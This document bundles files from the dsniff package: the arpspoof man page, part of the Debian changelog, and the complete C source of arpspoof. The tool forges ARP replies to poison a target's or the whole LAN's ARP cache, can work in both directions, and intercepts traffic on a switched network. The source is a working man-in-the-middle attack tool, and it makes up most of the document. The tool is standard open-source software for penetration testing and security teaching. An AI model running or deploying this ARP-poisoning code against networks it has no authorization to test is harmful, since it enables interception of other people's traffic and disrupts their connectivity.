arpspoof.8
.TH ARPSPOOF 8
.ad
.fi
.SH NAME
arpspoof
\-
intercept packets on a switched LAN
.SH SYNOPSIS
.na
.nf
.fi
\fBarpspoof\fR [\fB\-i \fIinterface\fR] [\fB\-c \fIown|host|both\fR] [\fB\-t \fItarget\fR] [\fB\-r\fR] \fIhost\fR
.SH DESCRIPTION
.ad
.fi
\fBarpspoof\fR redirects packets from a target host (or all hosts)
on the LAN intended for another host on the LAN by forging ARP
replies.  This is an extremely effective way of sniffing traffic on a
switch.
.LP
Kernel IP forwarding (or a userland program which accomplishes the
same, e.g. fragrouter(8)) must be turned on ahead of time.
.SH OPTIONS
.IP "\fB-i \fIinterface\fR"
Specify the interface to use.
.IP "\fB-c \fIown|host|both\fR"
Specify which hardware address t use when restoring the arp configuration;
while cleaning up, packets can be send with the own address as well as with
the address of the host. Sending packets with a fake hw address can disrupt
connectivity with certain switch/ap/bridge configurations, however it works
more reliably than using the own address, which is the default way arpspoof
cleans up afterwards.
.IP "\fB-t \fItarget\fR"
Specify a particular host to ARP poison (if not specified, all hosts
on the LAN). Repeat to specify multiple hosts.
.IP "\fB\-r\fR"
Poison both hosts (host and target) to capture traffic in both directions.
(only valid in conjuntion with \-t)
.IP \fIhost\fR
Specify the host you wish to intercept packets for (usually the local
gateway).
.SH "SEE ALSO"
dsniff(8), fragrouter(8)
.SH AUTHOR
.na
.nf
Dug Song <dugsong@monkey.org>


debian/changelog
dsniff (2.4b1+debian-31) unstable; urgency=medium

  [ Marcos Fouces ]
  * Acknowledge Janitor commits.
  * Update d/copyright.

  [ Debian Janitor ]
  * Update standards version to 4.6.0, no changes needed.
  * Remove constraints unnecessary since buster (oldstable)
  * Update standards version to 4.6.1, no changes needed.

 -- Marcos Fouces <marcos@debian.org>  Fri, 04 Nov 2022 18:22:37 +0100

dsniff (2.4b1+debian-30) unstable; urgency=medium

  [ Samuel Henrique ]
  * Add salsa-ci.yml
  * Configure git-buildpackage for Debian

  [ Deb Janitor ]
  * Use secure URI in Homepage field.
  * Set debhelper-compat version in Build-Depends.
  * Fix day-of-week for changelog entries 2.4b1-10, 2.4b1-3.6, 2.4b1-3.5.

  [ Marcos Fouces ]
  * Bump to debhelper-compat 12.
  * Add Rules-Requires-Root: no in control file.
  * Bump to Standards-Version 4.5.0
  * Add modified 37_fix-lib-and-share-dirs.patch (Closes: #919631).
  * Remove -Wl,--as-needed linker flags as they are no more needed
    with Bullseye toolchain.
  * Update uploader email to @debian.org.
  * Add 38_fix-pcap_init.patch (Closes: #980588)
  * Bump to debhelper-compat level 13.
  * Bump to Standards-Version 4.5.1 (no changes required).
  * Build against libtirpc as a separate library.

 -- Marcos Fouces <marcos@debian.org>  Wed, 10 Feb 2021 18:26:44 +0100

dsniff (2.4b1+debian-29) unstable; urgency=medium

  [ Raphaël Hertzog ]
  * Update team maintainer address to
    Debian Security Tools <team+pkg-security@tracker.debian.org>
  * Update Vcs-Git and Vcs-Browser for the move to salsa.debian.org

  [ Samuel Henrique ]
  * d/copyright: Remove trailing whitespace and align author names

  [ Marcos Fouces ]
  * Update to dh 11
  * Remove trailing whitespaces.
  * Fix spelling errors spotted by Lintian.
  * Update copyright years.
  * Add proper Files-excluded field in d/copyright.
  * Bump to Standards-revision 4.2.1 (no changes required).
  * Use secure URL in d/watch file.
  * Bump to uscan version 4.

 -- Marcos Fouces <marcos.fouces@gmail.com>  Sun, 04 Nov 2018 22:22:12 -0200

dsniff (2.4b1+debian-28) unstable; urgency=medium

  [ Lukas Schwaighofer ]
  * fix implicit declarations compiler warning
    - switch to C99 uint64_t, remove now unnecessary xdr_u_int64_t function
    - include missing string.h for memset
  * bump Standards version to 4.0.0 (no change required)

 -- Lukas Schwaighofer <lukas@schwaighofer.name>  Fri, 21 Jul 2017 20:05:34 +0200

dsniff (2.4b1+debian-27) unstable; urgency=high

  * Fix a parallel FTBFS due to missing Makefile dependencies.  Thanks to
    Adrian Bunk (Closes: #869086).

 -- Lukas Schwaighofer <lukas@schwaighofer.name>  Thu, 20 Jul 2017 20:00:38 +0200

dsniff (2.4b1+debian-26) unstable; urgency=medium

  * Team upload.

  [ Marcos Fouces ]
  * Fix 27_arpspoof-allow-use-of-multiple-interface.patch
    Thanks to João Salavisa. Closes: #706766
  * Add 34_Add_CPPFLAGS.patch to build binaries with
    all default Debian compiler flags.

  [ Lukas Schwaighofer ]
  * no longer export CC, cross compiling works fine without on dh 10
  * avoid unnecessary linking by passing -Wl,--as-needed
  * pass prefix= to dh_auto_install instead of calling make directly
  * remove outdated information from README.Debian, document notable changes
    from upstream instead

  [ Raphaël Hertzog ]
  * Drop Recommends on libx11-6, it's already in Depends via
    shlibs:Depends.

 -- Raphaël Hertzog <hertzog@debian.org>  Thu, 15 Jun 2017 18:20:50 +0200

dsniff (2.4b1+debian-25) unstable; urgency=medium

  * debian/control: Added myself to Uploaders.
  * Make sure libmissing.a is built before PROGS (Closes: #860611).

 -- Lukas Schwaighofer <lukas@schwaighofer.name>  Wed, 19 Apr 2017 20:15:27 +0200

dsniff (2.4b1+debian-24) unstable; urgency=medium

  * Fix FTCBFS: Pass triplet-prefixed CC to configure.
    Thanks to Helmut Grohne (Closes: #852360).
  * Add four patches from Fedora:
    (Closes: #715646, #716355, #716457, #716458)
    + 29_libnet_name2addr4.patch
    + 30_pntohl_shift.patch
    + 31_sysconf_clocks.patch
    + 32_rpc_segfault.patch (Closes: #855869)
  * Polish, reorder and refresh patches.
  * Add 33_sshcrypto_DES.patch
  * Improve dep3 description in 33_sshcrypto_DES.patch
  (as request by Stretch release team)

 -- Marcos Fouces <mfouces@yahoo.es>  Mon, 13 Mar 2017 18:34:19 +0100

dsniff (2.4b1+debian-23) unstable; urgency=medium

  * Assign to pkg-security team (Closes: #847505)
  * Add 24_Fix-OpenSSL1.1.0-Build.patch.
    Thanks to Christoph Biedl. Closes (#828287)
  * Bump to dh compat level 10
  * Update copyright file
  * Bump to standards-revision 3.9.8
  * Fix copyright file
  * Add hardening options
  * Add 25_fix-spelling-errors.patch

 -- Marcos Fouces <mfouces@yahoo.es>  Tue, 06 Dec 2016 12:08:15 +0100

dsniff (2.4b1+debian-22.1) unstable; urgency=low

  * Non-maintainer upload.
  * Fix TDS decoder patch (Closes: #712648).

 -- Andrew Shadura <andrewsh@debian.org>  Sat, 30 Nov 2013 21:29:23 +0100

dsniff (2.4b1+debian-22) unstable; urgency=low

  * Acknowledge NMU.
     + Thanks Hilko Bengen
  * Bump standards to 3.9.3.
  * Added a patches:
     + Fix POP decoder in dsniff (Closes: #647583).
     + Add both communication partners in arpspoof (Closes: #650749).
     + Allow multiple targets to be imitated simultaniously (Closes: #650751).
     + arpspoof: allow the selection of source hw address (Closes: #650752).
     + Thanks Stefan Tomanek.

 -- William Vera <billy@billy.com.mx>  Tue, 06 Mar 2012 22:42:43 -0600

dsniff (2.4b1+debian-21.1) unstable; urgency=low

  * Non-maintainer upload.
  * Updated urlsnarf timestamp patch (Closes: #636202)

 -- Hilko Bengen <bengen@debian.org>  Tue, 06 Sep 2011 10:15:26 +0200

dsniff (2.4b1+debian-21) unstable; urgency=low

  * Changed patch system to quilt from dpatch.
  * Updated debian/README.source for quilt.
  * Removed lintian override.
  * Cleanup the debian/rules.
  * Build-Depend changed to libdb-dev (>= 4.7) (Closes: #548478).

arpspoof.c
/*
 * arpspoof.c
 *
 * Redirect packets from a target host (or from all hosts) intended for
 * another host on the LAN to ourselves.
 * 
 * Copyright (c) 1999 Dug Song <dugsong@monkey.org>
 *
 * $Id: arpspoof.c,v 1.5 2001/03/15 08:32:58 dugsong Exp $
 *
 * Improved 2011 by Stefan Tomanek <stefa@pico.ruhr.de>
 */

#include "config.h"

#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#ifdef __FreeBSD__
#include <sys/ethernet.h>
#endif
#include <netinet/in.h>
#include <netinet/if_ether.h>

#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <err.h>
#include <libnet.h>
#include <pcap.h>

#include "arp.h"

extern char *ether_ntoa(struct ether_addr *);

struct host {
	in_addr_t ip;
	struct ether_addr mac;
};

static libnet_t *l;
static struct host spoof = {0};
static struct host *targets;
static char *intf;
static int poison_reverse;

static uint8_t *my_ha = NULL;
static uint8_t *brd_ha = "\xff\xff\xff\xff\xff\xff";

static int cleanup_src_own = 1;
static int cleanup_src_host = 0;

static void
usage(void)
{
	fprintf(stderr, "Version: " VERSION "\n"
		"Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host\n");
	exit(1);
}

static int
arp_send(libnet_t *l, int op,
	u_int8_t *sha, in_addr_t spa,
	u_int8_t *tha, in_addr_t tpa,
	u_int8_t *me)
{
	int retval;

	if (!me) me = sha;

	libnet_autobuild_arp(op, sha, (u_int8_t *)&spa,
			     tha, (u_int8_t *)&tpa, l);
	libnet_build_ethernet(tha, me, ETHERTYPE_ARP, NULL, 0, l, 0);
	
	fprintf(stderr, "%s ",
		ether_ntoa((struct ether_addr *)me));

	if (op == ARPOP_REQUEST) {
		fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
			ether_ntoa((struct ether_addr *)tha),
			libnet_addr2name4(tpa, LIBNET_DONT_RESOLVE),
			libnet_addr2name4(spa, LIBNET_DONT_RESOLVE));
	}
	else {
		fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
			ether_ntoa((struct ether_addr *)tha),
			libnet_addr2name4(spa, LIBNET_DONT_RESOLVE));
		fprintf(stderr, "%s\n",
			ether_ntoa((struct ether_addr *)sha));
	}
	retval = libnet_write(l);
	if (retval)
		fprintf(stderr, "%s", libnet_geterror(l));

	libnet_clear_packet(l);

	return retval;
}

#ifdef __linux__
static int
arp_force(in_addr_t dst)
{
	struct sockaddr_in sin;
	int i, fd;
	
	if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
		return (0);

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = dst;
	sin.sin_port = htons(67);
	
	i = sendto(fd, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin));
	
	close(fd);
	
	return (i == 0);
}
#endif

static int
arp_find(in_addr_t ip, struct ether_addr *mac)
{
	int i = 0;

	do {
		if (arp_cache_lookup(ip, mac, intf) == 0)
			return (1);
#ifdef __linux__
		/* XXX - force the kernel to arp. feh. */
		arp_force(ip);
#else
		arp_send(l, ARPOP_REQUEST, NULL, 0, NULL, ip, NULL);
#endif
		sleep(1);
	}
	while (i++ < 3);

	return (0);
}

static int arp_find_all() {
	struct host *target = targets;
	while(target->ip) {
		if (arp_find(target->ip, &target->mac)) {
			return 1;
		}
		target++;
	}

	return 0;
}

static void
cleanup(int sig)
{
	int fw = arp_find(spoof.ip, &spoof.mac);
	int bw = poison_reverse && targets[0].ip && arp_find_all();
	int i;
	int rounds = (cleanup_src_own*5 + cleanup_src_host*5);

	fprintf(stderr, "Cleaning up and re-arping targets...\n");
	for (i = 0; i < rounds; i++) {
		struct host *target = targets;
		while(target->ip) {
			uint8_t *src_ha = NULL;
			if (cleanup_src_own && (i%2 || !cleanup_src_host)) {
				src_ha = my_ha;
			}
			/* XXX - on BSD, requires ETHERSPOOF kernel. */
			if (fw) {
				arp_send(l, ARPOP_REPLY,
					 (u_int8_t *)&spoof.mac, spoof.ip,
					 (target->ip ? (u_int8_t *)&target->mac : brd_ha),
					 target->ip,
					 src_ha);
				/* we have to wait a moment before sending the next packet */
				sleep(1);
			}
			if (bw) {
				arp_send(l, ARPOP_REPLY,
					 (u_int8_t *)&target->mac, target->ip,
					 (u_int8_t *)&spoof.mac,
					 spoof.ip,
					 src_ha);
				sleep(1);
			}
			target++;
		}
	}

	exit(0);
}

int
main(int argc, char *argv[])
{
	extern char *optarg;
	extern int optind;
	char pcap_ebuf[PCAP_ERRBUF_SIZE];
	char libnet_ebuf[LIBNET_ERRBUF_SIZE];
	int c;
	int n_targets;
	char *cleanup_src = NULL;

	spoof.ip = 0;
	intf = NULL;
	poison_reverse = 0;
	n_targets = 0;

	/* allocate enough memory for target list */
	targets = calloc( argc+1, sizeof(struct host) );
    
	if ((l = libnet_init(LIBNET_LINK, NULL, libnet_ebuf)) == NULL)
		errx(1, "%s", libnet_ebuf);


	while ((c = getopt(argc, argv, "ri:t:c:h?V")) != -1) {
		switch (c) {
		case 'i':
			intf = optarg;
			break;
		case 't':
			if ((targets[n_targets++].ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
				usage();
			break;
		case 'r':
			poison_reverse = 1;
			break;
		case 'c':
			cleanup_src = optarg;
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;
	
	if (argc != 1)
		usage();

	if (poison_reverse && !n_targets) {
		errx(1, "Spoofing the reverse path (-r) is only available when specifying a target (-t).");
		usage();
	}

	if (!cleanup_src || strcmp(cleanup_src, "own")==0) { /* default! */
		/* only use our own hw address when cleaning up,
		 * not jeopardizing any bridges on the way to our
		 * target
		 */
		cleanup_src_own = 1;
		cleanup_src_host = 0;
	} else if (strcmp(cleanup_src, "host")==0) {
		/* only use the target hw address when cleaning up;
		 * this can screw up some bridges and scramble access
		 * for our own host, however it resets the arp table
		 * more reliably
		 */
		cleanup_src_own = 0;
		cleanup_src_host = 1;
	} else if (strcmp(cleanup_src, "both")==0) {
		cleanup_src_own = 1;
		cleanup_src_host = 1;
	} else {
		errx(1, "Invalid parameter to -c: use 'own' (default), 'host' or 'both'.");
		usage();
	}

	if ((spoof.ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1)
		usage();
	
	libnet_destroy(l);
	
	if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
		errx(1, "%s", pcap_ebuf);
	
	if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
		errx(1, "%s", libnet_ebuf);

	struct host *target = targets;
	while(target->ip) {
		if (target->ip != 0 && !arp_find(target->ip, &target->mac))
			errx(1, "couldn't arp for host %s",
			libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
		target++;
	}

	if (poison_reverse) {
		if (!arp_find(spoof.ip, &spoof.mac)) {
			errx(1, "couldn't arp for spoof host %s",
			     libnet_addr2name4(spoof.ip, LIBNET_DONT_RESOLVE));
		}
	}

	if ((my_ha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) {
		errx(1, "Unable to determine own mac address");
	}

	signal(SIGHUP, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGTERM, cleanup);

	for (;;) {
    if (!n_targets) {
      arp_send(l, ARPOP_REPLY, my_ha, spoof.ip, brd_ha, 0, my_ha);
    } else {
		struct host *target = targets;
		while(target->ip) {
			arp_send(l, ARPOP_REPLY, my_ha, spoof.ip,
				(target->ip ? (u_int8_t *)&target->mac : brd_ha),
				target->ip,
				my_ha);
			if (poison_reverse) {
				arp_send(l, ARPOP_REPLY, my_ha, target->ip, (uint8_t *)&spoof.mac, spoof.ip, my_ha);
			}
			target++;
		}
    }

		sleep(2);
	}
	/* NOTREACHED */

	exit(0);
}
